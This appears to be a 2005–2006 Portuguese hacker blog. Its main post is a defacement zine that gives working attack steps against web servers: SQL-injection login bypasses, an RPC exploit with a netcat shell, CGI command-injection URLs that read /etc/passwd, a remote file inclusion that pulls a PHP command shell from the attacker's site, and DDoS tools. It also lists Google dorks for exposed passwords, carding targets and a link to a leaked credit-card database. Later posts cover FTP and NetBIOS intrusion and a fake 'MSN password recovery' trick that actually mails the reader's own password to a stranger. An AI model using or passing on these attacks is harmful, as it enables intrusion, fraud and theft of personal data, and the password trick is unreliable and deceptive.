Thursday, April 13, 2006

ESSA ZINE É PRIVATE, NÃO DISTRIBUA!!!!!PRIV8 = DO NOT DISTRIBUTE

# ###### # # ###### # # # # # # # # # # # # # # # Os últimos suspiros de um nick que só # ###### # # ###### # # # # me deu alegria aheuaheua. # # # # # # # # # # # # # # # # # # # # # # ##### # # # # # ###### ###### # r0x a lot
Texto: D1C45 Autor: C4N4®10
Introdução--------------------------------------JavallyPDW ------------------------------------------- Javallyproxy-------------------------------------------JavallySQL Injection ----------------------------------JavallyRPC --------------------------------------------JavallyPHPwebsite--------------------------------------JavallydDos--------------------------------------------JavallyNetbios ----------------------------------------JavallyCGI --------------------------------------------JavallyYABBSE.php--------------------------------------JavallyBug para carders--------------------------------Hualdo (Shadow Boys)Usando o Google como scanner--------------------Hualdo (Shadow Boys)Banco de dados----------------------------------Javally, Hualdo (Shadow Boys)
################# #INTRODUÇÃO (UI)# #################
Muito bem, se você decidiu ler essa zine é porque acha que tem mais a aprender, e isso é bom.
/////// // X X // > Porra, o cara ja tá traçando a / \__~/ Emmanuele!!! ///// (\ \) (~) // o ( \ \ / / // > ( \ \/ /____________/ \__O ( \__/ _____\// / /( / / ______)/ ( // \ \ / / ( ) \ () \ \O/ ` \ ) ) ) ) / / ( _ / /_ (____> (____> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Para entender essa zine você deve ter noção de IP (uehauea falano assim é até engraçado mas esse texto é beeeeeeeem básico), um pouco de DOS e linux e principalmente, ESQUEÇA DE UMA VEZ POR TODAS ESSE NEGOCIO DE INVADIR COMPUTADORES PESSOAIS, estamos falando de servidores http.O que é um deface? Ato de desfigurar sites da web em diversas plataformas, substituindo a index do site pela que você desejar, normalmente inserindo nela algum protesto e seu nick. Se você não tem um nick, sugiro que crie um, pois seu nick é a sua identidade no mundo defacer.
_ ,-. / ) ( `. // /-._/ / Bom, agora vamos ao que interessa!!! `\ \ /(_/ / / / ______________________________________ ; `-` (_/ / / (_/ / Racionais Mc´s lançam seu novo CD, Nada como um dia após o outro, depois de \ Sobrevivendo no Inferno!!!!!!!!!!!! ) /` / / $$$$$$$$$
Primeiro bug que o titio Javally vai ensinar:Bom, como em todas as zines que eu ja vi até hoje, o primeiro bug a ser ensinado é o clássico PDW ######## # PDW # ######## nuss, a Emmanuele ta com 2 cara!!!
PDW = PASTAS DA WEBALVO = IIS 4.0 on Windows NT4, Windows 2000, Windows XP, Windows 2003 ServerNota = Iniciante
Bom, quando eu aprendi esse bug ele era tido como um bug desprezivel, já que é facílimo de ser explorado e muito antigo. Os caras que se acham "elite" não usam esse bug, mas ele tem catado muito antigamente, pois, ao contrario do que os elite de merda esperavam, o bug está presente nos windows novos e nos IIS (Internet Information Server) 4, 5 e 6.0Para explorar esse bug, você precisa de um scanner, eu sugiro o Arplhmd Group Exploit, que pode ser encontrado em http://www.arplhmd.zor.org (lá vc ve como funciona)Após achar o site vulneravel, você vai no mirc e digita: /dns ip-do-site, para ver qual é o endereço do site, tipo, www.site.comDaí voce vai em iniciar, executar e joga essa string: %WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}
Pronto, vai abrir uma janela. Nessa janela vc coloca nova pasta da web e coloca o endereço do site que voce pegou com o scanner.Vai aparecer uma pastinha com o nome do site, daí vc entra nela e altera a index ou default, à carater do servidor.Pronto, agora coloca sua index e sai por aí gritando que você é ráquer...
######### # Proxy # __ #########
Para explorar algumas falhas, usamos 0 navegador. Porem, seu IP pode ficar logado no sistema...Nossa, e agora??? Calma...Tipo, para que nosso IP não seja descoberto e a festa não acabe, vamos usar um proxy.Nossa, um PROXY!!!! maaaaaaeee, agora eu sei o que um proxy...hehehehe O que é um proxy?É um computador, um servidor à longa distancia normalmente que permite que você se conecte a ele primeiro e ele se conecta ao site, ou seja, nesse site ficará logado o IP do proxy e não o seu, sacou?? Vixi, agora eu so o SR. anonimo!!!Calma, tb naum é assim, voce tem que procurar um proxy que te deixe totalmente anônimo, pelo contrario voce pode ser pego e seu pai te deixa de castigo um mês (ou fodem vc na cadeia).Vc vai em propriedades do navegador (IE), conexões e seleciona Configurações da LAN. Aí vc procura proxy e coloca o ip do proxy que você arranjou.Depois você entra na net, tipo, normalmente quando tá mais lento é pq funcionou, mas naum vamos arriscar, entre em algum site que você conhece que mostra seu IP e faça o teste.Se aparecer o IP do proxy, é isso ae, mãos a obra.Mas javally, como eu procuro proxys???Não precisa procurar,eu sei onde tem muiiiiitos
http://www.samair.ru/proxy/ (isso vale ouro galera)
vai la...pode falar, eu so lind0!!Tipo, eu naum uso proxy, mas tipo, você usa se quiser, eu recomendo apenas para invadir sites brasileiros e tal, gringo nem dá nada.
################# # SQL Injection # (basicão) #################ALVO: IIS 5.0 (Ruindows 2000)Nota: Iniciante-medio
Esse bug é muito legal hehuaehuaeVoce vai encontrar vários sites bugados, mas não vai conseguir ownar (possuir, usado para designar um deface) todos. Essa falha consiste em injetar comandos no banco de dados SQL obtendo privilegios de administrador.Para procurar um site vulneravel usaremos o Google (nossa, o Google??) é, isso mesmo.O diretório onde você vai injetar a string é:
/admin/index.asp/admin/default.asp
tb tem esses:/admin/adm/admin/index.asp /admin/default.asp/admin/admin.asp/admin/login.asp/admin/
entrar.asp/admin/default.asp/admin/index.asp/admin/login.asp/admin/password.asp/admin/senha.asp/login/
login.asp/adm/login.asp/adm/index.asp/adm/default.asp/admin/site/entrar.asp/ecommerce/admin/index.asp/
ecommerce/admin/default.asp/ecommerce/admin/login.asp
Existem outros mas nunca funcionou comigo... Tipo, vc vai no Google e procura por sites vulneraveis, assim: allinurl: "/admin/index.asp" ou "/admin/index.asp.Quando você achar o site vulnerável, você vai inserir a string. Deverá aparecer um campo para login e senha, daí vc coloca:
login: 'or'1 ou 'or''='senha: 'or'1 ou 'or''='
' or ' 1' or '1'='1' or 1=1--'or''='' or 'a'='a') or ('a'='a
Daí se o site estiver vulnerável você vai cair no diretório do admin, aí você procura o caminho da index e owna o site! Tipo, você tb pode faze otras coisas do tipo criar um user pra vc e etc.
Hey sandro, vc manda melhor???
####### # RPC # #######
Vários cara me pediram para não publicar tutoriais sobre esse bug, mas alguns motivos me levaram a publicar:
1- No mundo deface esse bug jé é muito conhecido;2- Todos tem direito à informação.3- Eu so bonzinho =)
RPC = Remote Procedure Call (Chamada de procedimento remoto)ALVO = Windows NT4, Win 2000, Win XP, WIn 2003 ServerNota: Good
Tipo, quem não ler isso com atenção e não buscar mais informações não vai conseguir ownar por esse bug, pq ele exige um pouco mais de atenção.O exploit usa a porta 135, então qdo vc ver algum micro com essa porta aberta vc ja fica atento...Vc pode usar o mesmo scanner que o de pdw mas com um script diferente para usar esta falha. O legal do RPC é que ele não pega apenas servidores mas tambem personal computers (mas lembre o que eu disse sobre invadir os outros)Após achar os IP´s vulneráveis, voce faz o seguinte:baixe os exploits para RPC:
http://www.facef.br/dc.ziphttp://www.facef.br/dc3.zip
Agora baixe o netcat, que será usado para conectar você ao computador explorado:
http://www.facef.br/nc.zip
Copie rápido os exploits, esse site eu invadi a um temp atras e uso ele como se fosse meu ftp auheuaha, copia rapido pq pode sair do ar.
Vixi, que lindo, agora você já tem tudo em mãos, vamos à prática:
***A EMMANUELE TÁ CAVALGANDO NO NEGÃOZINHO...***
Você vai entra no prompt do dos, ir até a pasta onde vc colocou os exploits e digitar o nome do exploit. Você verá que vão aparecer várias targets, daí vc escolhe a target correspondente ao sistema a ser explorado e manda bala.Se aparecer "Use the netcat to conect to server", aí que você vai usar o netcat, da seguinte forma:nc ip 44444444 é a porta que o exploit abre pra vc entrarVixi, que legau, o exploit abre uma porta pra mim???dãhhhh, no comments =se der certo, vc vai cair em C:/windows/system32se der errado, naum acontece nadaTipo, vc vai demorar um pouco pra achar computadores vulneraveis mas paciencia, vida de ráquer é dificil...EEEEEEEEEEEEEEEEEEEEEEEE, agora eu sei RPC !!!!maaaaaaaaaaee, eu so hacker agora, num conta pra ninguem!!!!
############### # PHP Website # ###############
Ohhhhhhhh, agora vamos aprender PHP Website!!!
ALVO: Linux (vixi)Nota: sUx
Tipo, essa falha é babaca, mas pra quem quiser aprende vai aí a dica:Use o Arplhmd Group Exploit que ele faz tudo pra vc :*Após achar o site vulneravel, com o mesmo scanner, voce faz o seguinte:coloca lá: www.site.com/setup (substitua o site.com pelo site vulnerável)Agora vc está no setup do site, faça o que quiser, primero crie um usuario pa vc depois entre como admin e detona tudo(PS: nunca usei isso)*Meu deus, agora eu sei hackear linux... maaaaaaaaaaaaaaeeee*
. TA COMEÇANDO OTRO FILME DA EMMANUELE!!!!!! . \./ \./ . \./ . \^.\ \\.// /.^/ \--.\ \\.// /.--/ \--. \ \\.// / .--/ \---.\ \./ /.---/ \--.\ \./ /.--/ \ .\ . /. / _ -_^_^_^_- \ \\ // / -_^_^_^_-_ - -/_/_/- ^ ^ ^ ^ -\_\_\- -
######## # dDoS # O Perfume de Emmanuele ########
Bom.. vou falar sobre DDoS (Distributed Denial of Service). Traduzindo ficaria Negação de Serviço Distribuída. Pela tradução você já tem uma idéia do que significa. Mas, mesmo se assim você não entendeu, significa fazer com que uma determinada máquina na rede pare de responder à requisições, ou seja, os usuários legítimos dela não irão utilizar seus serviços, enquanto o ataque DDoS se suceder. Esse foi um ataque bastante utilizado nos sites mais visitados do mundo, como Yahoo, Altavista, Amazon.com, etc. Note que esses sites ficaram indisponíveis durante horas e horas. Aqui no Brasil também houveram e ainda há ataques DDoS. Sites como Cade?, Zipmail, UOL, entre outros foram atacados. O ataque DDoS consiste em enviar um grande número de requisições à umadeterminada máquina. Esta vai tentar responder. Até que no começo ela provavelmente irá conseguir responder às requisições. Mas se as requisições forem contínuas, vai ter um momento em que a máquina não terá capacidade para respondê-las e assim vai deixar de responder a qualquer outra máquina que a requisite. O objetivo foi realizado! Ninguém agora consegue visualizar sequer uma html do seu site... nada!É como se a máquina estivesse desligada. Vou mostrar graficamente mais ou menos como funciona um ataque:
____________ _____ Largura de _ banda alta ---- /__________ / ___ ALVO / ________ / / ____________ _____ ____________ _____ <-- / Largura Server ___ /____________ de _ <-- VOCÊ _ \ banda alta --------- \ __________ __________ \ ___ _________ \ \ \ ____________ _____ \ Largura de _ banda alta ---- __________ ___
Nota: As máquinas de largura de banda alta são mais eficientes, mas computadores pessoais podem ser usados também.
Você deve ter perguntando antes: mas como fazer grandes números de requisições?? Simples... para isso usamos outros computadores (o que deuma certa forma nos protege, se atacássemos diretamente dos nossos seríamos descobertos rapidamente). Em um ataque DDoS usamos muitos computadores. Sevocê não quiser usar tantos computadores assim, podepraticar o ataque usando computadores de largura de banda alta, geralmente encontrados nas Universidades americanas. Desse modo será preciso poucos computadores, já que eles têm enorme poder de ataque. Algumas chegavam a ter uma largura de banda de 200 MB... você tem idéiado que significa isso? Bom.. vamos ao que interessa... O ataque funcionadessa forma: você envia um pacote à essas máquinas, elas "entendem" quedevem requisitar intermitentemente o servidor, que será o alvo. Assim,o alvo não suportará as requisições e ficará indisponibilizado. As máquinas que você deve usar para suceder o ataque devem estar infectadas com um servidor de serviço. Ou seja, você eve infectá-las, ou conseguir ips de algumas com algum amigo. Eu não estou colocando ips à disposição, pois voce vai fazer merda auauehuae. Os programas mais usados para ataques são: TFN (Tribe Flood Network), TFN2k, trin00, e agora um mais poderoso, que age em conjunto com esses: o mstream. Você pode encontrar ferramentas para praticar um ataque em: http://www.ussrback.com/distributed.htm
(PS: O desenho foi copiado de um site em inglês.) =]
~ _ ~ A Emmanuele deu até a (@#$%¨&*) fazer bico ~ ,----`-, - ) / ,--. /_/ > ) ,\__-' \ \_ \ ~~-___ ) \ \ %%%%%%% ########### # NetBios # ###########
Aee, decidi falar um pouco sobre isso que não é uma falha nem nada, tipo, não se cata servidores e nem faz-se deface. Eu coloquei isso aqui para que você possa ter uma idéia do que é e explorar esse "descuido" das pessoas. Eu acho pelomenos umas 80 máquinas vulneráveis com isso, server para você ter acesso ao computador remoto e ler as informações mais sigilosas, inserir trojans, enfim, fazer uma diversidade de coisas, isso vai da criatividade de cada um. Muitos podem me criticar por expor isso assim dessa maneira, outros podem me achar babaca, mas eu não to nem fudendo com isso não, tipo, quem achar ruim que faça melhor...Seguinte:Muitas pessoas utilizam o compartilhamento de rede do Windows, as chamadad redes Microsoft.A maioria delas, compartilha o diretorio c: inteirinho e NÃO coloca senha, naum me pergunte porque... o povo é burro memo mas essa é otra historia hehehehe.Daí você vai usar um programa milagroso chamado R3X. A maioria dos lammers tem mas não sabem como usar... é foda neh... Tipo, no site tem um tutorial de como usar esse programa, como eu naum so papai noel, vc lê o tuto e depois se tiver alguma dúvida me procura que eu esclareço...Achando ips vulneraveis ( cara isso é mtttto facil e pega mttttto) você vai no seu navegador e coloca:\\iptipo:\\192.168.0.1daí se não pedir senha, mete bronca, c:/ interinho na sua mão ou a pasta que o pato tiver compartilhado.Não há muito o que comentar sobre isso, ae, pros elite que tem fama de hacker na cidade mas só entram por compartilhamento, sinto mto mas vão ter que descobrir otra coisa uheuaheuaheua.O R3X vc acha em:http://www.invasao.com.brmete bronca =) ######## # CGI # Porra, to de saco cheio de digitar =/ ########
Exploit local root: www.bundadimel.hpg.com.br/mremap_pte
Javally, como que eu faço pra ownar por CGI??? cara, eu vo te falar, mas vc naum vai sair espalhando? Claro que não, pode confiar blz, to confiando hein...
Bom pra começar vc precisa de um scaner que vc ja tem, ele scaneia essa vulnerabilidade.
Então vamos ao q interessa vul de CGI é STRINGS q é um comando q vc taka assim www.site.com/strings=COMANDOS LINUX e é isso CGI...
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls
/cgi-bin/eshop.pl?seite=;ls
/scripts/calendar/calender.pl?config=cat%20/etc/passwd
/cgi-bin/directory.php?dir=%3Bcat%20/etc/passwd
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=/bin/id
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=/bin/ls
/cgi-bin/mailmanager.pl?setupfile=demo&page=/bin/ls
http://www.victim.com/cgi-bin/bb-hist.sh?HISTFILE=/home/*
mas a q funciona mais no momento q é a vuln do scaner é a seguinte:
www.vulhost.com/arquivobugado.cgi?file=uname+-a;id
Tipo, pra explorar essas vulnerabilidades você tem que ter um mínimo conhecimento de Linux, tipo, isso vc vai atrás,acha em qualquer site sobre linux e como eu ja disse, não so papai noel...
############ #YABBSE.PHP# ############ __________________________ Falae, a zine ta ajudando hein??? ---------------------------
Tipo, só pra reforçar, o Arplhmd tem varios scripts, ou seja, ele é capaz de scanear em várias falhas, tipo, basta vc baixar o script de scan, por isso eu naum vo entrar em detalhes...
Após achar o site vulnerável, vc joga a seguinte string:
www.site.com/yabbse/Sources/Packages.php?sourcedir=www.SEUSITE.com.br/cmd.php?cmd=COMANDOS DE LINUX
Em lugar de www.SEUSITE.com.br/cmd.php você deve indicar um site onde tenha um cmd em php, isso va acha na net mas qualquer coisa eu ajudo tb.
Sacou???Nossa Java, mas aí eu tenho acesso ao sistema??? daí eu sugiro que você jogue um backdoor em /tmp (pasta onde você tem permissão pra executar arquivos no Linux) , execute o backdoor e entre por telnet ou até mesmo netcat.procure o backdoor telnetd já compilado, ae, naum tenho o endereço,mas qualquer coisa me dá um toque que eu discolo.Tipo, eu duvido que alguem que tá lendo owne por essa falha, mas tipo, se conseguir eu pago um X-tudo no komilão. =D.
#################### # Bug para Carders # ####################
[] [] [] [] [] [] [] [] [] [] [] [] [] [] []==============Carder - cartmanager================[] [] [] [] [] [] [] [] [] [] [] [] [] [] []-----------------------------------------------------------------Esses tutorias de Carder que irei publicar serão bem simples.------------------------------------------------------------------> Procurando sites bugados
O modo mais simples certamente é o Google(www.google.com) mas sevocê sabe bem de alguma linguagem de programação recomendo que façaseus próprios scans ;)Para achar sites bugados com essa falha v´no Google e digite:allinurl: cart.cgi ouallinurl: cartmanager.cgi------------------------------------------------------------------> Explorando
Modifique o site :
Exemplo: www.a1ts.com.br
.Modifique por
Exemplo: www.a1ts.com.br/cgi-bin/Admin_files/ -----------------------------------------------------------------Ps. Nunca se esquece que os MDBs e os scripts podem variar de diretorio ;) Esse txt é para aprendizado não me responsabilizo pelo que você vier a fazer.
######################### #Usando Google como scan# #########################
Realmente o google e muito util pois com alguns comandos (strings) voce podera achar coisas incriveis e muito uteis.
Alguns exemplos abaixo
allintitle: "index of/root" O google e muito util pois podera dar alguns resultados muito satisfatorios com comandos (strings)
inurl:usuarios.mdb inurl:users.mdb inurl:site.ini inurl:password.mdb inurl:orders.log
"Index of /admin" "Index of /password" "Index of /mail" "Index of /" +passwd "Index of /" +password.txt "Index of /" +.htaccess index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index authors.pwd.index service.pwd.index filetype:config web gobal.asax index
allintitle: "index of/admin" allintitle: "index of/root" allintitle: sensitive filetype:doc allintitle: restricted filetype :mail allintitle: restricted filetype:doc site:gov
inurl:passwd filetype:txt inurl:admin filetype:db inurl:iisadmin inurl:"auth_user_file.txt" inurl:"wwwroot/*."
top secret site:mil confidential site:mil
allinurl: winnt/system32/ (get cmd.exe) allinurl:/bash_history
intitle:"Index of" .sh_history intitle:"Index of" .bash_history intitle:"index of" passwd intitle:"index of" people.lst intitle:"index of" pwd.db intitle:"index of" etc/shadow intitle:"index of" spwd intitle:"index of" master.passwd intitle:"index of" htpasswd intitle:"index of" members OR accounts intitle:"index of" user_carts OR user_cart
################## # Banco de dados # ##################
Lembrando: USE PROXY PELAMORDIDEUS!!!!!!
Tipo, esse banco de dados foi disponibilizado pelo nosso amigo Hualdo do grupo Shadow Boys, eu não tenho nenhum envolvimento com isso, apenas estou publicando para que voce possa entender como fuinciona o mecanismo, tipo, se você fizer merda você mesmo q vai se ferrar...Trata-se de um banco de dados com informações pessoais, incluindo cartões de crédito e senha portanto, se voce naum tiver juizo nem clique no endereço. by Javally
http://www27.brinkster.com/hualdoath/dados/menu_meio2.zip
__________________________________________________________________________________________________
AHHHH JAVA, JÁ ACABOU A ZINE???
Logico, pq ja acabou minha paciencia... TIPO, APOSTO QUE DEPOIS DA PUBLICAÇÃO DESSA ZINE NUMA CIDADEZINHA PORCA COMO GUAXUPÉ, VÃO APARECER ALTOS HACKERS AÍ DIZENDO QUE INVADEM TUDO E SÃO OS FODAS... TIPO, EU JA DISSE E REPITO, NÃO MECHO MAIS COM INVASÃO E ESTOU MUITO FELIZ ASSIM, E QUERIA DEIXAR BEM CLARO QUE , SEM QUERER ME EXIBIR, NÃO COLOQUEI NEM 10% DO QUE SEI SOBRE O ASSUNTO NESSE TEXTO.Ae, pros hackers fodões, tipo, se vcs são tão bons, nem precisam ler essa zine.Dae, TO LIGADO QUE VARIOS CARA VÃO LER ISSO E SAIR DIZENDO POR AÍ: o Javally é um bosta, eu manjo muito mais que ele auehuaheuaheuauheuae.... tipo, podecre, agora q ja leram o q EU escrevi eu so um bosta...
BOM PESSOAL, TEM MUIIIIITO MAIS, MAS DEXA PRA PRÓXIMA ZINE!!qualquer crítica,guarde pra voce...
PS: os desenhos foram feitos por uns mano meu...
Javally =/ ah, Emmanuele foi presa =(

Tuesday, April 04, 2006

Sites hacker úteis

ae galera, aki eu fiz uma coletânia d alguns sites utilitários para dicas d downloads d programas

http://planetahacker.pandela.net/

http://mestrehackers.ubbihp.com.br/inicial.htm

http://www.recargagratis.k25.net/

http://www.menteshackers.1br.net/

http://www.elitedemestres.tk/

http://wareez.z6.com.br/

http://supergames.to.md/

http://super-hacker.etc10.com.br/

http://www.crimeboys.1br.net/

http://museuhacker.1br.net/

http://www.defacement.cjb.net/

http://www.clubedoshackers.com/?ref=http://www.top30.com.br/

http://recargagratis.vai.la/

http://www.hackersgb.1br.net/

http://www.segurancahacker.com/

http://geocities.yahoo.com.br/obscure_hacker

http://s12.invisionfree.com/On_Cheats/

http://www.kmf.kit.net/

http://www.portalhacker.tz4.com/

http://www.gfhp.com.br/

http://lordshackers.zip.net/

http://www.jenean.k6.com.br/

http://www.conexaohacker.kit.net/

http://vampirohack.zip.net/

http://geocities.yahoo.com.br/memhacker2/

http://geocities.yahoo.com.br/shhacker_2005/

http://www.revolucaohacker.1br.net/

http://www.fusionlords.1br.net/

http://bromahacker.cjb.net/

http://www.muheros.com.br/

http://www.megahacker.1br.net/

http://www.superaim.ubbi.com.br/

http://www.atackmess.kit.net/

http://www.rotatorqueen.rg3.net/

http://www.senhafacil.rg3.net/

http://www.cellfree.cjb.net/

http://megacompras.vila.bol.com.br/tele.htm

http://geocities.yahoo.com.br/guilhermeunderground

http://www.destruicaohacker.org/

http://celulargratis.host.sk/

http://maklorram.sites.uol.com.br/mafia.html

http://www.hacktools.rg3.net/

http://www.hackersmal.kit.net/

http://www.geocities.com/piratadanet100

http://www.hackspf.cjb.net/

http://www.exodoforce.cjb.net/

http://www.anarquiadoshackers.cjb.net/

http://blog.cjb.net/zoreia29

http://www.chaoshackers.ubbi.com.br/

http://www.brcheats.tk/

Entrar em sites em lugares restritos

Como entrar em sites que universidades e escolas não permitem. Bem, numa rede escolar ou universitária, geralmente vc precisa da sua matrícula para entrar na rede. Geralmente a rede é formada de computadores com Windows XP e vc tem permissões minímas. Bem, na rede da minha Universidade (e creio que na maioria tbm é assim), todo pacote HTTP passa antes por um proxy que verifica se o pacote contem alguma palavra proibída (tipo proxy, Orkut, fotolog.net, enfim)... então a URL www.fotolog.net não entra, nem a pesquisa do google por orkut, por ter a palvra proibída na URL. Então pensei em colocar o IP do site que quero, pq aí não teria a palvra proibída... Fui no DOS e digitei tracert www.fotolog.net Aí achei o IP e tentei... mas vi que não dava tbm... Então eu pensei no seguinte, fazer os pacotes não passarem pelo Proxy da Universidade... Aí tentei colocar um endereço proxy mas eu não tinha acesso a Opções da Internet. Aí que me veio a luz. O Windows tranca essa opção no IE pq eu não tenho acesso de administrador... Mas ele não pode trancar por exemplo no Firefox... Aì fui tentar instalar o FireFox mas não tinha permissão de instalação deste programa no Arquivo de Programas da unidade C:/ Então lembrei que quando vc entra numa rede tipo de colégio, vc tem um espaço para vc, que é geralmente o F:suamatricula e que nesse espeço vc tem permissão completa. Então baixei o Firefox e instalei no meu espaço... mas agora vinha um problema, como eu iria achar um endereço proxy se proxy é uma das palvras proibídas?????? Simples, usei o site http://www.browseany.com para acessar o site http://www.publicproxyservers.com/index.html e usei um proxy deles... Porém aí eu notei uma coisa... se eu usasse um proxy que acessasse pela porta 80, tbm bloqueava as palavras proibídas... Então usei um Proxy que não acessasse a porta 80 e voilá... é bastante parecido com HTTP Tunneling né?!?! pq isso na verdade faz as requisitações de HTTP passarem por uma porta diferente...

Sunday, July 24, 2005

Alguns links para vcs c divertirem

ALGUNS UTILITÁRIOS

Mozilla Firefox 1.0.3Melhor browse do mundo!

http://download.mozilla.org/?product=firefox-1.0.3&os=win&lang=pt-BR

brutus...melhor programa para quebrar senhas
http://geocities.yahoo.com.br/bloodhound_server/brutus-aet2.zip

Clone do MSN Messenger para Linuxlink: ->
http://prdownloads.sourceforge.net/...msn-0_94.tar.gz

Sonic Universe 2 20 bem daora Jogue com Sonic, Tails, Knuckles, Amy, Shadow e mais um personagem secreto em diversas fases! Além disso, o jogo tem um bônus secreto e fases secretas! Para fazer cheats, na tela de seleção de personagens, pressione "C" e digite um cheat qualquer (que você ganha no jogo). PS: uma tela em inglês aparecerá. Aguarde que o download irá começar automaticamente Visite o site do desenvolvedor: www.gamingbrasil.net

Truco 3.0.7.155 jogue truca contra seu pc e eletem as msg em pt e quando o pc começa a perder ele manda umas msg q chega a ser engraçado http://giesbrecht.netfirms.com/Arquivos/Truco.exe


ALGUNS FIREWALLS
Firewalls:ZoneAlarm Free 5.5.062 [6,34 Mb] Windows 95/98/Me/2000/XPlink: http://download.zonelabs.com/bin/fr..._55_062_004.exe

Sygate Personal Firewall 5.6 [8,80MB] Windows 95/98/Me/2000/XPlink:
http://software-files.download.com/...d=2092&siteId=4

Friday, July 22, 2005

Invadindo pela porta 666

Para invadir é facil vc deve ter um programa de conexão via telenet (telnet q ja vem com o WIN95 ou similar) e também um programa chamado aabout. O q deve ser feito, este programa aabout deve ser acionado por ambas as parte (invasor e invadido) e o q ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666. Vc deve ligar o telenet colocar no rost o numero do IP da pessoa e em port deve-se colocar 666. Bem vc ja esta conectado, dai no login vc deve digita cg! (com o "!") e dar um dir vendo tudo o q tem no CPU da outra pessoa.

Hackear Sevidores

Como Hackear Servidores de FTP Para hackear um servidor FTP, primeiro você deve saber o endereço do host ou seu IP, para isto use o IPSCAN, digitando o IP Principal do Host: Lista de Alguns FTP's ftp.mandic.com.br ftp.bestway.com.br ftp.internetclub.com.br ftp.netscape.com ftp.angelfire.com Let's HaCk !!! Existem vários Programas de FTP'S, se não quiser saber de ftp porra nenhuma use o do DOS !!! Va ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br . Ao conectar ele pedirá a senha e o Password, tente user os passwords UNIX, se não der você deve entrar INVISÍVEL !!!! > Como entrar Invisível??? No login pressione ENTER, no password pressione Novamente... Ira aparecer o prompt ftp> novamente...., ai é só digitar... quote user ftp , pressione ENTER e digite: quote cwd ~root Pressione ENTER novamente e digite: quote pass ftp Pronto, você esta Hackeando... Mas tem um porem..., se escrever a mensagem : user restriction aplly, você não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX.... ATENÇÃO !!!! Não tente Hackear usando o user normal de FTP'S, que é login : anonymous e password: seu E-Mail, pois vai ser aplicado a proteção... Porra entrei, que devo fazer agora? Ao entrar você vai estar no Diretório do login, tipo \home\root\ Dai, para ver a lista de users você volta um dir vá para o dir \home\ e cada dir é um usuário,... não tentem pegar as senhas , pois são Cryptografadas... Pois a maioria dos users usa a mesma senha login... Ok... se você não sabe os comandos, ai vai a dica...., se você estiver no MS-DOS, digite ? e tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear !!! Não fique mais que 5 Min em um servidor, pois ele caçara seu IP, e seu login, e vai ser CADEIA !!! Não me responsabilizo por atos cometidos nos Hosts... o problema é de quem HaCkEiA, e não nosso, pois tome muito cuidado, e NUNCA, mas NUNCA apague NADA !!!!!

Pegando IP em chat

Feche todos os seus aplicativos de rede, ICQ, FTP, XITAMI..., que você estiver usando. Feche todos os navegadores que não sejam da sala aonde o cara se encontra é lógico! Concentre-se só na sala do chat na qual se encontra o cara que você quer pegar o ip. Peça as pessoas que estão conversando com você para pararem de te mandarem mensagens, quando isto acontecer mande algumas mensagens em sequência para vitima, você aprende isto na parte de chat desta HP. Alterne para o seu MS-DOS (ALT +TAB) , na hora e digite: arp -a Ficando assim: C:IWWDOWS> arp -a Neste momento serão retomados, vários IP'S, ( 4 à 6 em média). O primeiro é o IP da sala aonde você se encontra. Entretanto, na "MAIORIA DAS VEZES" o segundo IP é do gafanhoto que você quer mandar para os sapos ! Se você não tem certeza e deseja confirmar isto, guarde o IP e compare com as informaçòes que você tem sobre a vítima (rovedora por exemplo). Se você não sabe nada dela, paciência, pegue todos os IP's e nuke um à um, ou faça um ping flood que será explicado abaixo, ou repita o procedimento acima várias vezes e guarde os IP'S que estão repetindo com mais frequência. E tome as medidas que desejar.

Invasão por IP

Certifique-se de que o computador que você quer acessar possui este programa: nbtstat.
Vá ao Prompt do MS-DOS.
Digite: nbtstat -a o IP do computador que você quer acessar
Aparecerá se a pessoa tiver compartilhamento de arquivos as pastas do PC dela. Se não aparecerá : Host Not Found (o complicado é que não da para invadir certos computadores por causa disso, então não se entusiasme tanto pois só da para invadir aquelas pessoas que tem no PC compartilhamento de arquivos as pastas)
Caso apareça um monte de nomes esquisitos com isso antes : "<03>", você deve pegar o nome do negócio que estiver com <03> atrás do nome.
Crie um arquivo .txt com o nome de LMHOSTS. Digite lá : O IP do computador que será acessado NetBios dele. O NetBios é aquele nome esquisito que tem o atrás. (Digite exatamente daquela forma)
Mapeie sua unidade de disco de forma que a máquina acessada se torne parte de seu PC.
Vá em "Iniciar", "Executar" e digite: //IP_da_máquina_acessada e ponha "OK"
Pronto! Você acessou (invadiu) por IP!

Como pegar senha d msn???

E ae galera, essa eh pra vc atormentar a vidinha d qm t enche o saco....hehehe..mas tomem cuidado, eu não me responsabilizo pelos atos cometidos por vcs..divirtam!!!!!!!

Como descobrir senhas MSN Messenger e Hotmail IMBATÍVEL! O método utilizado pelo http://www.hotmail.com.br para dar uma senha perdida é utilizar o assistente da sua web, mas se observarmos bem iremos notar que é apenas um 'bot' que a única coisa que faz é enviar de forma interna os dados para poder redirecioná-los à sua base de dados. O que nem toda a gente sabe é que este processo (normalmente realizado na web) não é mais que um envio ao e-mail mailreceiverpassaport@hotmail.com um formato pré-establecido: Consiste em enviar um e-mail fazendo-se passar pelo boot,utilizando a sua codificação, é automático e não tem a mínina segurança, ainda assim não o usem muito porque senão podemos descobrir e acabar com nossa festa né?


Siga atentamente as instruções, a troca de apenas uma letra invalida o processo.


1º PASSO:

No campo "para:"(destinatário): escrever: mailreceiverpassaport@hotmail.com

2º PASSO:

No campo Assunto escrever:(usa copiar e colar) :
GOTO_PassRecovery_mail_MSN:000f-1a2a-r045

3º PASSO:

NA PRIMEIRA LINHA (IMPORTANTE QUE SEJA A PRIMEIRA LINHA DO CORPO DA MENSAGEM) Escrever o seguinte:

Rec_To-USR_RCVR:(e-mail da vitima)@hotmail.com/use_redir_gerza

4º PASSO :

NA QUARTA LINHA PÕE O SEGUINTE:

REDIRECT_TO:(seu_email):(tua senha)

